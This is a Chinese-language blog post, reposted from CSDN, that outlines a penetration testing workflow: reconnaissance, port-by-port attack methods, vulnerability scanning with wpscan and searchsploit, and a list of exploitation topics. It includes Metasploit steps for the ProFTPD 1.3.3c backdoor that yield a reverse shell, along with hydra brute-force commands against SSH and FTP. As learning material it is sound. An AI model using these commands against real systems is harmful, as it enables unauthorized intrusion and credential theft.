0


渗透测试完整流程

一、信息收集

(一)、收集域名信息

1、whois

(二)、收集子域名信息

1、fofa

在这里插入图片描述domain=“域名”

(三)、查找真实IP

1、有无cdn

1.通过ping
2.nslookup查询

(四)、收集常用端口信息

端口号服务程序21FTP ,文件传输协议22SSH,安全登录、文件传送(SCP)23Telnet,不安全的文本传送80HTTP,超文本传送协议(WWW)110POP3,Post Office Protocol(E-mail)443主要用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP1433Microsoft的SQL服务开放的端口3306MySQL服务开放的端口3389远程桌面默认的端口

21端口:

运行在21端口的是FTP服务,FTP用于在Internet上控制文件的双向传输。同时,他也是一个应用程序。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。
21端口为ftp版本漏洞 当查看有开放的21端口时,就可以查看ftp的版本,搜索ftp版本漏洞。
例如:
21端口测试 查看到ftp的版本,搜索得知ftp为ProFTPD 1.3.3c存在后门漏洞
启动MSF的终端

msfconsole

搜索proFTPD的攻击模块,并载入

search proFTPD  //搜索proFTPD的攻击模块
use exploit/unit/ftp/proftpd_133c_backdoor  //载入选择模块

填写模块内容 并执行,之后反弹shell

不知该填写什么参数可以 show一下

show options  //需要填写的信息
set RHOSTS 192.168.*.**  //目标IP
run  //执行

还可以尝试爆破登录ftp账号

22端口:

dc-4
https://blog.csdn.net/qq_45590470/article/details/127449700

使用kali的工具hydra对目标IP的22端口进行暴力破解

爆破命令:

hydra -l(用户名) root -P(爆破字典) /usr/pass.txt(绝对路径,pass.txt为字典文件名,可以将自己的字典加入到该目录下)

-V(显示爆破过程) -t(指定线程数) 10 ssh://127.0.0.1(如果是默认端口,可以不写,如果不是默认端口,要加端口xx,如ssh://127.0.0.1:xx)

暴力破解获得密码,获得用户及密码后可以使用ssh进行连接22端口。

ssh 用户名@IP地址

这里介绍一下hydra的一些参数

-R 继续从上一次进度接着破解

-S 大写,采用SSL链接

-s 小写,可通过这个参数指定非默认端口

-l 指定破解的用户,对特定用户破解

-L 指定用户名字典

-p 小写,指定密码破解,少用,一般是采用密码字典

-P 大写,指定密码字典

-e 可选选项,n:空密码试探,s:使用指定用户和密码试探

-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M 指定目标列表文件一行一条

-o 指定结果输出文件

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t 同时运行的线程数,默认为16

-w 设置最大超时的时间,单位秒,默认是30s

-v /-V显示详细过程

各协议的具体命令:

格式+示例:

1、破解ssh:

hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

参数说明:

-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止。

23端口:

爆破(hydra、msf中的ssh爆破模块)

1433端口|SQL服务开放的端口

SQL Sever的服务端口
SQL Server服务使用两个端口:tcp-1433、UDP-1434.其中1433用于供SQLServer对外提供服务,1434用于向请求者返回SQLServer使用了哪些TCP/IP端口。1433端口通常遭到黑客的攻击,而且攻击的方式层出不穷。最严重的莫过于远程溢出漏洞了,如由于SQL注射攻击的兴起,各类数据库时刻面临着安全威胁。利用SQL注射技术对数据库进行渗透是目前比较流行的攻击方式,此类技术属于脚本渗透技术。
(1)对于开放1433端口的SQL Server2000的数据库服务器,黑客尝试使用远程溢出漏洞对主机进行溢出测试,成功后直接获得系统权限。(https://blog.csdn.net/gxj022/article/details/4593015)
(2)暴力破解技术是一项经典的技术。一般破解的对象都是SA用户。通过字典破解的方式很快破解出SA的密码。(https://blog.csdn.net/kali_linux/article/details/50499576)
(3)嗅探技术同样能嗅探到SQL Server的登录密码。
(4)由于脚本程序编写的不严密,例如,程序员对参数过滤不严等,这都会造成严重的注射漏洞。通过SQL注射可间接性的对数据库服务器进行渗透,通过调用一些存储过程执行系统命令。可以使用SQL综合利用工具完成。

3306端口|MySQL服务开放的端口

MySQL数据库的服务端口
攻击方法:爆破/注入
数据库可通过phpMyAdmin软件进行操作,如果目标引入phpMyAdmin软件,那么我们可以查找phpMyAdmin存在的部分漏洞。同时注意phpMyAdmin的配置,配置不当的话,也会存在漏洞。

3389端口|远程桌面默认的端口

3389是windows远程桌面服务默认监听的端口,管理员通过远程桌面对服务器进行维护,这给管理工作带来的极大的方便。
攻击方法:1、弱口令用hydra爆破工具。
2、cain是一款超级的渗透工具,同样支持对3389端口的嗅探。

(五)、收集敏感目录文件

1、dirsearch

(六)、指纹识别

1、wappalyer

(1)、CMS内容管理系统

(2)、web服务器

(3)、操作系统

二、漏洞挖掘

wordpress

(1)、cewl

cewl是通过爬行网站获取关键信息创建一个密码字典。

(2)、wpscan

wpscan工具收集用户名

wpscan --url http://dc-2/ -e u

(3)、searchsploit

dc-3 CMS:Joomia

(4)、msf

经验漏洞

在这里插入图片描述

三、漏洞利用

1.掌握SQL注入漏洞的原理与实践

2.掌握文件包含漏洞的原理与防御方法

3.理解命令执行漏洞与防御

4.掌握XSS漏洞原理与防御

5.掌握CSRF与SSRF请求伪造漏洞原理与防御

6.掌握任意文件上传与任意文件读取漏洞

四、提权

标签: 安全 网络 web安全

本文转载自: https://blog.csdn.net/qq_45590470/article/details/127760215
版权归原作者 coner00 所有, 如有侵权,请联系我们删除。

“渗透测试完整流程”的评论:

还没有评论